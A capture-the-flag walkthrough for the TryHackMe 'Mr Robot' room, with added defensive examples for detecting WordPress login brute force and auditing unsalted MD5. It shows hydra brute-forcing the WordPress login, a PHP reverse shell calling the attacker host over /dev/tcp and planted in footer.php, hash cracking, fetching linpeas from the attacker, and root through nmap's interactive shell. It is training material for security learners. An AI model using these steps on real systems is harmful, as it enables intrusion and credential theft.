# Mr Robot CTF

**Room Link:** <https://tryhackme.com/room/mrrobot>

## Scanning

**Kali**

```
nmap -A $VICTIM
```

<figure><img src="/files/icwy1eNlssR4PHlurPoM" alt=""><figcaption></figcaption></figure>

### Scan all ports

No other ports found.

**Kali**

```
nmap -sV -sT -O -p 1-65535 $VICTIM
```

<figure><img src="/files/tpCD5vGO9DSfzaUuW5qg" alt=""><figcaption></figcaption></figure>

### HTTP port 80

This ran for the majority of the time I was working on the box. I found the WordPress site and checked robots.txt manually, and the scan didn't really find anything of interest.

**Kali**

```
dirb http://$VICTIM:80 /usr/share/wordlists/dirb/big.txt
```

<figure><img src="/files/RTNUJKiiIYE3ETgS8dGv" alt=""><figcaption></figcaption></figure>

#### Key 1

<figure><img src="/files/8DWKGXlSaa0oPVWzaS9E" alt=""><figcaption></figcaption></figure>

**Downloaded fsocity.dic**

<figure><img src="/files/UjxgFsHWPoUweT4AFZDK" alt=""><figcaption></figcaption></figure>

If you refresh the page you'll go to a wordpress site.

<figure><img src="/files/iJlNoHcSSh13VyW3jX5P" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/HvVoGjVGCZSSmjubVbdR" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/ozRHjk4ogLGKz6OPCTkX" alt=""><figcaption></figcaption></figure>

Test which users exist in WordPress: if the user doesn't exist, the login form returns an error saying the username is invalid, so that error text can be used as the failure condition.

<figure><img src="/files/B0yBPiSXRPh2W1p3GyBx" alt=""><figcaption></figcaption></figure>

**Kali**

```
hydra -L fsocity.dic -p test $VICTIM http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.70.148%2Fwp-admin%2F&testcookie=1:Invalid username" -V -t 30
```

<figure><img src="/files/HjyY8nqYh00UuYeBHgJR" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/TUwW3f0uM96dPvc8dXvE" alt=""><figcaption></figcaption></figure>

Because there were so many entries in fsocity.dic I tried to reduce it as much as I could by removing duplicates and passwords that I thought would be unlikely.

**Kali**

```
# Remove duplicate lines
sort -u fsocity.dic > new-fsocity.dic
# Remove lines of 4 characters or fewer
sed -r '/^.{,4}$/d' new-fsocity.dic > new-new-fsocity.dic
# Remove lines that contain only digits
awk '! /^[0-9]+$/' new-new-fsocity.dic > nonums.dic
# Remove lines longer than 11 characters
sed '/^.\{11\}./d' nonums.dic > final.txt
```

**Kali**

```
hydra -l Elliot -P fsocity.dic $VICTIM http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.70.148%2Fwp-admin%2F&testcookie=1:is incorrect." -V -t 30
```

<figure><img src="/files/oSGugUC4ZSiiYuRxlp4d" alt=""><figcaption></figcaption></figure>
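The two hydra runs above show up in the web server log as a burst of POST requests to /wp-login.php from one address. This added example (not part of the original writeup) parses constructed Apache access-log lines and flags that pattern, using the fact that WordPress answers a failed login with HTTP 200 and a successful one with a 302 to wp-admin; the log lines, addresses and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
# Apache "combined" access-log line; only the fields we need are captured.
LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], TS_FMT)
    e["status"] = int(e["status"])
    return e

def detect_wp_login_bruteforce(lines, window=timedelta(seconds=60), threshold=20):
    """Flag IPs that POST to /wp-login.php >= threshold times inside one window.
    WordPress answers a failed login with 200 (form re-rendered with the error
    text hydra keys on) and a successful one with a 302 to wp-admin."""
    posts = defaultdict(list)                      # ip -> [(ts, status), ...]
    for line in lines:
        e = parse(line)
        if e and e["method"] == "POST" and e["path"].split("?")[0] == "/wp-login.php":
            posts[e["ip"]].append((e["ts"], e["status"]))
    alerts = {}
    for ip, events in posts.items():
        events.sort()
        start = 0
        for end in range(len(events)):             # sliding time window
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {"failed": sum(1 for _, s in events if s == 200),
                              "succeeded": any(s == 302 for _, s in events)}
                break
    return alerts

def _line(ip, ts, method, path, status):            # builds a constructed log line
    return f'{ip} - - [{ts.strftime(TS_FMT)}] "{method} {path} HTTP/1.1" {status} 3492 "-" "Mozilla/5.0"'

# Constructed sample: a 40-guess burst that ends in a 302, plus a quiet legitimate user.
T0 = datetime(2023, 10, 10, 12, 0, 0, tzinfo=timezone.utc)
SAMPLE_LOG = ([_line("10.10.10.5", T0 + timedelta(milliseconds=50 * i), "POST", "/wp-login.php", 200) for i in range(40)]
              + [_line("10.10.10.5", T0 + timedelta(seconds=3), "POST", "/wp-login.php", 302)]
              + [_line("192.168.1.20", T0 + timedelta(minutes=5 * i), "POST", "/wp-login.php", 200) for i in range(3)]
              + [_line("192.168.1.20", T0, "GET", "/robots.txt", 200)])
```

A 302 from an address that was just flagged is the event worth paging on, since it means one of the guesses was accepted.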

## Reverse Shell

### Reverse Shell Failed Attempt

**revshell.php code**

```
<?php
// $KALI is the listener address used throughout this writeup; inside a PHP
// double-quoted string it would be read as a PHP variable, so substitute the real address.
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>
```

**Kali**

```
vi revshell.php
zip revshell.zip revshell.php
nc -lvnp 443
```

<figure><img src="/files/cQgR4BBnaVtkEJJ9gGJp" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/cWhDGyULrrhKellHVFgp" alt=""><figcaption></figcaption></figure>

Connection is made but it isn't stable.

<figure><img src="/files/oihC5zCXDHsFD9TiASm4" alt=""><figcaption></figcaption></figure>

### Reverse Shell

wpscan found that the twentyfifteen theme is installed.

**Kali**

```
wpscan --url http://$VICTIM
```

<figure><img src="/files/oQEHcKY6vPPY01Aw5Lmo" alt=""><figcaption></figcaption></figure>

**Kali**

```
nc -vlnp 443
```

Added the same shell to footer.php, which should be included on every page visited. Then I just went back to http://$VICTIM/join and it worked.

<figure><img src="/files/u4IQbdvcZsvp0VomwRJx" alt=""><figcaption></figcaption></figure>

Upgrade to an interactive TTY with tab completion

**Victim**

```
# in the reverse shell on the victim
python -c 'import pty; pty.spawn("/bin/bash")'
# press Ctrl+Z to background the shell, then on Kali:
stty raw -echo; fg
```

**Victim**

```
cd /home/robot
ls
cat password.raw-md5 
```

<figure><img src="/files/SeDdp6yoXyJVpD98kiRM" alt=""><figcaption></figcaption></figure>

**Kali**

```
hashcat -m 0 password.raw-md5 /usr/share/wordlists/rockyou.txt
hashcat -m 0 password.raw-md5 /usr/share/wordlists/rockyou.txt --show
```

<figure><img src="/files/bLlVTK7Bbmb1xQ4yi14f" alt=""><figcaption></figcaption></figure>
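hashcat -m 0 succeeds here because the file holds unsalted MD5 hashes and the password is a dictionary entry. This added example (not from the writeup) does the same audit in Python over a constructed hash file: it assumes the hashcat raw-MD5 layout of one hex digest per line, optionally prefixed with `user:`, and computes its hashes locally rather than copying anything from the box.

```python
import hashlib

def md5hex(word):
    """Hex MD5 of a candidate string, which is all hashcat -m 0 computes per guess."""
    return hashlib.md5(word.encode()).hexdigest()

# Constructed hash file in the layout hashcat -m 0 reads: one hex MD5 per line,
# optionally prefixed "user:" as in password.raw-md5. Hashes are computed here.
HASH_FILE = "\n".join([
    "robot:" + md5hex("abcdefghijklmnopqrstuvwxyz"),
    "alice:" + md5hex("correct horse battery staple"),
    md5hex("123456"),                  # line without a username column
    "not a hash line",                 # junk that must be skipped
])
WORDLIST = ["password", "123456", "qwerty", "abcdefghijklmnopqrstuvwxyz", "letmein"]

def parse_raw_md5(text):
    """Yield (user, hash) pairs; user is None when the line has no prefix."""
    for line in text.splitlines():
        user, _, h = line.strip().rpartition(":")
        h = h.lower()
        if len(h) == 32 and all(c in "0123456789abcdef" for c in h):
            yield (user or None), h

def audit_raw_md5(text, wordlist):
    """Return {hash: (user, plaintext)} for every unsalted MD5 a wordlist entry
    reproduces. With no salt, each candidate is hashed once and checked against
    every target, so cost grows with the wordlist, not the number of users."""
    targets = {h: user for user, h in parse_raw_md5(text)}
    found = {}
    for word in wordlist:
        h = md5hex(word)
        if h in targets:
            found[h] = (targets[h], word)
    return found
```

A salted, slow hash (bcrypt, scrypt, Argon2) would force one expensive computation per user per guess instead of one cheap lookup.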

**Victim**

```
su robot
Password: abcdefghijklmnopqrstuvwxyz
```

<figure><img src="/files/Bz98Ivcy0k9AbmQOZz34" alt=""><figcaption></figcaption></figure>

### LinPeas

**Kali**

```
# download linpeas.sh, then serve the current directory on port 81 for the victim
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
python2 -m SimpleHTTPServer 81
```

**Victim**

```
cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh
```

<figure><img src="/files/eNPIGArgqVT1sz5wL6WN" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

**Victim**

```
/usr/local/bin/nmap --interactive
nmap> !sh
```

<figure><img src="/files/xpWXgn63luNTT9d25Hme" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/lor6IJ3b5x41FFRlVNp3" alt=""><figcaption></figcaption></figure>


